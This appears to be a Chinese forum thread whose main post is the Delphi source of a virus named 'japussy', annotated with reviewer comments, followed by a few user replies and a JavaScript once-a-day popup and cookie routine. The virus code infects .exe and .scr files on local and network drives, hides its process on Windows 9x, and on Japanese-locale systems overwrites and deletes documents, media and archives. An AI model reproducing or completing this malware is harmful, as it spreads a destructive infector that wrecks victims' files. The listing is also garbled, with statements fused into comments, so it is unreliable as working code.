{$r *.res}
// Static import of the kernel32 export RegisterServiceProcess. The main
// program below calls it as (getcurrentprocessid, 1) when iswin9x is true.
// NOTE(review): on Windows 9x this call is commonly used to keep a process
// out of the Close Program task list. Treat the import as a stealth
// indicator during triage. Static linking against this export would normally
// also stop the image from loading on NT-family systems - confirm.
function registerserviceprocess(dwprocessid, dwtype: integer): integer;
stdcall; external 'kernel32.dll';
// Globals shared by the routines below.
var
// Path handed to createprocess by the main program.
tmpfile: string;
// Startup/process records passed to createprocess.
si: startupinfo;
pi: process_information;
// Gate for the destructive branch in loopfiles (read there before smashfile).
isjap: boolean = false;
function iswin9x: boolean;
{ Returns true only when GetVersionEx succeeds and reports the Win32-on-Windows
  platform id (the 9x family). A failed query yields false. }
var
  osinfo: tosversioninfo;
begin
  // The API requires the caller to state the structure size up front.
  osinfo.dwosversioninfosize := sizeof(tosversioninfo);
  if getversionex(osinfo) then
    result := (osinfo.dwplatformid = ver_platform_win32_windows)
  else
    result := false;
end;
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
  dstartpos: integer; count: integer);
{ Copies `count` bytes from offset `sstartpos` of `src` to offset `dstartpos`
  of `dst`, then puts both stream positions back where they were on entry.
  No bounds are checked here; copyfrom raises if the source is too short. }
var
  srcsaved, dstsaved: integer;
begin
  // Remember where the caller left both cursors.
  srcsaved := src.position;
  dstsaved := dst.position;

  // Move to the requested offsets and transfer the bytes.
  src.seek(sstartpos, sofrombeginning);
  dst.seek(dstartpos, sofrombeginning);
  dst.copyfrom(src, count);

  // Restore the original cursors.
  src.seek(srcsaved, sofrombeginning);
  dst.seek(dstsaved, sofrombeginning);
end;
// Writes the part of the running executable (paramstr(0)) that follows its
// first `headersize` bytes into a newly created file `filename`.
// `headersize` is declared outside this listing.
// Every exception is swallowed by the empty except block, so the caller
// cannot tell whether the output file was written.
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
// Own image is opened read-only with no share restrictions.
sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
// fmcreate: creates the file, replacing one that already exists.
dstream := tfilestream.create(filename, fmcreate);
try
// Skip the leading headersize bytes and copy the remainder.
sstream.seek(headersize, 0);
dstream.copyfrom(sstream, sstream.size - headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
// NOTE(review): the terminator below is printed as ':' - this looks like
// transcription damage in the listing.
end:
procedure fillstartupinfo(var si: startupinfo; state: word);
{ Initialises the fields of `si` that this program uses before a
  createprocess call: the size field, the show-window request given by
  `state`, and nil/zero for the reserved, desktop and title members.
  Fields not listed here are left as the caller passed them. }
begin
  // Size field.
  si.cb := sizeof(si);

  // Ask for wshowwindow to be honoured and supply the requested state.
  si.dwflags := startf_useshowwindow;
  si.wshowwindow := state;

  // No desktop or title override.
  si.lpdesktop := nil;
  si.lptitle := nil;

  // Reserved members are cleared.
  si.lpreserved := nil;
  si.lpreserved2 := nil;
  si.cbreserved2 := 0;
end;
// Empty stub in this listing: it is called from infectfiles but performs no
// action here.
procedure sendmail;
begin
end;
// Per-file routine invoked from loopfiles for executable-style extensions.
// It decides whether `filename` is a PE image that has not been marked yet,
// then rebuilds the file in memory and saves it back over the original.
// Analyst notes grounded in the lines below:
//   * marker check: the last 4 bytes of the file are compared with `id`
//     (declared outside this listing);
//   * marker written: the 4-byte value $44444444 is appended to the rebuilt
//     image - presumably the same value as `id`, confirm;
//   * files smaller than 10240 bytes are always skipped;
//   * every exception is swallowed by the outer empty except block.
// NOTE(review): the four copystream calls and the seek are printed as
// comments here; this looks like transcription damage, so treat the listing
// as a behavioural outline rather than as the code that actually ran.
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try
// Case-insensitive comparison of the whole argument with the literal name.
if comparetext(filename, 'japussy.exe') = 0 then
exit;
infected := false;
ispe := false;
srcstream := tfilestream.create(filename, fmopenread);
try
// Look for the byte pair 'P','E' (#80, #69) at any offset from 0 to $108.
for i := 0 to $108 do begin
srcstream.seek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe
begin
ispe := true; break;
end;
end;
// Read the trailing 4 bytes; a match with `id` or a small file means "skip".
srcstream.seek(-4, sofromend); srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then exit;
icostream := tmemorystream.create;
dststream := tmemorystream.create;
try
// Pull the first icon of the target file into a memory stream.
aicon := ticon.create;
try
aicon.releasehandle;
aicon.handle := extracticon(hinstance, pchar(filename), 0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
// Reopen the target and the running image (paramstr(0)) for reading.
srcstream := tfilestream.create(filename, fmopenread);
hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
// copystream(hdrstream, 0, dststream, 0, iconoffset);
// copystream(icostream, 22, dststream, iconoffset, iconsize);
// copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
// copystream(srcstream, 0, dststream, headersize, srcstream.size);
// dststream.seek(0, 2);
// 4-byte marker written at the current position of the rebuilt image.
iid := $44444444;
dststream.write(iid, 4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
// The save sits in the finally section, so it runs even when a step above
// raised; the free of dststream is commented out as printed.
dststream.savetofile(filename); // dststream.free;
end;
except;
end;
end;
// Destructive routine invoked from loopfiles for the document/media/archive
// extensions when isjap is set. It clears the file's attributes, writes the
// buffer `catchword` (declared outside this listing) at evenly spaced
// offsets, then closes and deletes the file. Because parts of the content
// are overwritten before deletion, undelete tools alone should not be
// expected to return intact data; recovery planning should rely on backups.
// NOTE(review): as printed, `len` is never assigned, `max` is forced to 5
// unconditionally and the try has no visible except/finally partner - the
// missing pieces sit inside trailing // comments, which looks like
// transcription damage.
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
// Attribute value 0 clears read-only/hidden/system flags before writing.
setfileattributes(pchar(filename), 0);
filehandle := fileopen(filename, fmopenwrite);
try
size := getfilesize(filehandle, nil);
i := 0;
randomize;
max := random(15); // if max < 5 then
max := 5;
// Spacing between overwrite positions.
mass := size div max; // len := length(catchword);
while i < max do
begin
// Seek to the i-th position and overwrite from there.
fileseek(filehandle, i * mass, 0); //
filewrite(filehandle, catchword, len);
inc(i);
end;
finally
fileclose(filehandle); // end;
deletefile(pchar(filename)); //except
end;
end;
// Builds a string of drive letters by probing 'A:\' through 'Z:\' and keeping
// those that getdrivetype reports as drive_fixed or drive_remote.
// Defender's note: drive_remote means mapped network drives are in scope, so
// shares reachable from a host running this code are exposed as well as its
// local disks. Removable and optical drives are not selected by this test.
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do //
begin
// 65 is 'A'; i walks the 26 possible drive letters.
d := chr(i + 65);
str := d + ':\';
disktype := getdrivetype(pchar(str));
//
if (disktype = drive_fixed) or (disktype = drive_remote) then
result := result + d;
end;
end;
{ }
// Walks `path` for entries matching `mask`, dispatches each file by its
// extension, then recurses into every sub-directory of `path`.
// Defender's view of the dispatch below:
//   * .exe and .scr files are passed to infectonefile;
//   * when isjap is set, the document, media and archive extensions listed
//     further down are passed to smashfile (overwrite and delete);
//   * the .htm/.html/.asp, .wab, .adc and 'ind' branches have no surviving
//     body in this listing.
// NOTE(review): this listing is damaged. Several statements are fused into
// trailing // comments, begin/end pairs no longer balance, literals appear
// to have been lowercased wholesale (ext is upper-cased but compared with
// lowercase strings), and the index on subdir.strings seems to be missing.
// Read it as a behavioural outline, not as compilable source.
procedure loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
searchrec: tsearchrec;
msg: tmsg;
// Classifies a search record: 0 when attr is not 16 and the name is neither
// '.' nor '..'; 1 is assigned on the next statement. 16 is the value of the
// directory attribute (fadirectory); note that attr is compared for equality,
// not tested as a bit mask.
function isvaliddir(searchrec: tsearchrec): integer;
begin
if (searchrec.attr <> 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 0 // else if (searchrec.attr = 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 1 // else result := 2; //end;
begin
// First pass: every entry matching path + mask.
if (findfirst(path + mask, faanyfile, searchrec) = 0) then
begin
repeat
// Drains one pending window message per file.
peekmessage(msg, 0, 0, 0, pm_remove); // if isvaliddir(searchrec) = 0 then
begin
fn := path + searchrec.name;
ext := uppercase(extractfileext(fn));
// Executable-style targets.
if (ext = '.exe') or (ext = '.scr') then
begin
infectonefile(fn); //
end
// Web page, address book and mail-client file types: bodies not present here.
else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
begin
//
// // end
else if ext = '.wab' then //outlook begin
// end
else if ext = '.adc' then //foxmail
begin
//
end
else if ext = 'ind' then //foxmail
begin
// end
else
begin
// Destructive branch, gated on isjap.
if isjap then //
begin
if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
smashfile(fn); // end;
end;
end;
// sleep(200);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
// Second pass: collect sub-directory names, then recurse into each.
subdir := tstringlist.create;
if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
begin
repeat
if isvaliddir(searchrec) = 1 then
subdir.add(searchrec.name);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
count := subdir.count - 1;
for i := 0 to count do
loopfiles(path + subdir.strings + '\', mask);
freeandnil(subdir);
end;
{ }
// Top-level driver: tests the system ANSI code page against 932 (the
// Japanese Shift-JIS code page), obtains the drive letters from getdrives
// and, inside an endless loop, calls loopfiles with mask '*.*' for the drive
// roots in reverse order, followed by sendmail.
// Defender's note: the code page test is what arms the destructive branch in
// loopfiles (isjap), so hosts with a Japanese system locale face file
// destruction in addition to executable infection.
// NOTE(review): as printed, the isjap assignment, the len assignment, the
// loop's begin/end, the five-minute sleep and the procedure's closing end
// are all inside trailing // comments, and the drive index on driverlist
// seems to be missing - transcription damage.
procedure infectfiles;
var
driverlist: string;
i, len: integer;
begin
if getacp = 932 then // isjap := true; //
driverlist := getdrives; //len := length(driverlist);
while true do //begin
for i := len downto 1 do //
loopfiles(driverlist + ':\', '*.*'); //
sendmail; // sleep(1000 * 60 * 5); //end;
{ }
// Program entry. Visible behaviour, in order:
//   1. on Win9x, registerserviceprocess(getcurrentprocessid, 1) is called;
//   2. infectfiles is run;
//   3. tmpfile is built from the running image's path (paramstr(0)) with a
//      space (#32) and '.exe' appended, and createprocess is called on it
//      with handle inheritance enabled and '.' as the working directory.
// Hunting note: an executable whose name ends in ' .exe' (space before the
// extension), created next to and launched by a same-named program, matches
// step 3.
// NOTE(review): the comparison with 'japussy.exe', the else keywords, the
// delete() on tmpfile and the extractfile/fillstartupinfo calls are inside
// // comments as printed, and the final end has no '.', so the control flow
// shown here is not the original's - transcription damage.
begin
if iswin9x then //is win9x
registerserviceprocess(getcurrentprocessid, 1) //else //winnt
begin
//
//
end;
//if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
infectfiles //else //
begin
tmpfile := paramstr(0); // delete(tmpfile, length(tmpfile) - 4, 4);
tmpfile := tmpfile + #32 + '.exe'; // extractfile(tmpfile); // fillstartupinfo(si, sw_showdefault);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
0, nil, '.', si, pi);
infectfiles;
end;
end
天啊 这长!!!!!
这是js吗??
下面的是一天弹一次窗口的 改改用吧
//弹出窗口
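/**
 * Opens the promotional page once per cookie lifetime.
 *
 * If the "popUp_WebSite_pxy" cookie is absent, the cookie is set through
 * newCookie(..., 1) and the page is opened in a new browsing context, after
 * which focus is returned to the current window.
 *
 * The new window is opened with "noopener" so the opened page gets no
 * window.opener handle and cannot navigate this page. The target URL is
 * plain http, so its content can be altered in transit.
 */
function popUp() {
    // Cookie already present: the window has been shown within the lifetime.
    if (getCookie("popUp_WebSite_pxy") !== "") {
        return;
    }
    newCookie("popUp_WebSite_pxy", "xuexi_pxy", 1);
    // The return value was never used; with noopener it is null anyway.
    window.open('http://www.pxy.113317.com/?from=www.113317.com', '_blank', 'noopener');
    self.focus();
}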
//Cookie 处理函数
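/**
 * Returns the value of the cookie called `name`, or "" when it is not set.
 *
 * document.cookie is split on ";" and each "key=value" pair is compared by
 * its exact key. The previous character-by-character scan matched `name`
 * anywhere in the cookie string, so a cookie whose name or value merely
 * contained `name` could be returned instead; its end-of-value check was
 * also truncated in this listing. The value is returned as stored, with no
 * decoding, to stay in step with newCookie, which writes it unencoded.
 *
 * @param {string} name exact cookie name to look up
 * @returns {string} the stored value, or "" if the cookie is absent
 */
function getCookie(name) {
    var pairs = document.cookie.split(";");
    for (var i = 0; i < pairs.length; i++) {
        // Browsers separate pairs with "; ", so drop leading whitespace.
        var pair = pairs[i].replace(/^\s+/, "");
        var eq = pair.indexOf("=");
        if (eq !== -1 && pair.substring(0, eq) === name) {
            return pair.substring(eq + 1);
        }
    }
    return "";
}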
//写入新的Cookie值
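/**
 * Sets the cookie `id` to `value` with an expiry derived from `guoqi`.
 *
 * NOTE(review): the multiplier 24*60*60*30*1000 makes one unit of `guoqi`
 * equal to 30 days, not one day - confirm the intended lifetime. It is kept
 * unchanged here.
 *
 * `id` and `value` are written as given. A ";" inside either would be read
 * by the browser as the start of cookie attributes, so pass only fixed,
 * trusted strings. No path, Secure or SameSite attribute is set.
 *
 * @param {string} id cookie name
 * @param {string} value cookie value (written unencoded)
 * @param {number} guoqi lifetime in units of 30 days
 */
function newCookie(id, value, guoqi)
{
    var expires = new Date();
    expires.setTime(expires.getTime() + guoqi * 24 * 60 * 60 * 30 * 1000);
    // toUTCString replaces the deprecated toGMTString; the output is the same.
    var expiryDate = expires.toUTCString();
    document.cookie = id + "=" + value + ";expires=" + expiryDate;
}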
比较难~~~
cooooookie是什么东东
路过,二分。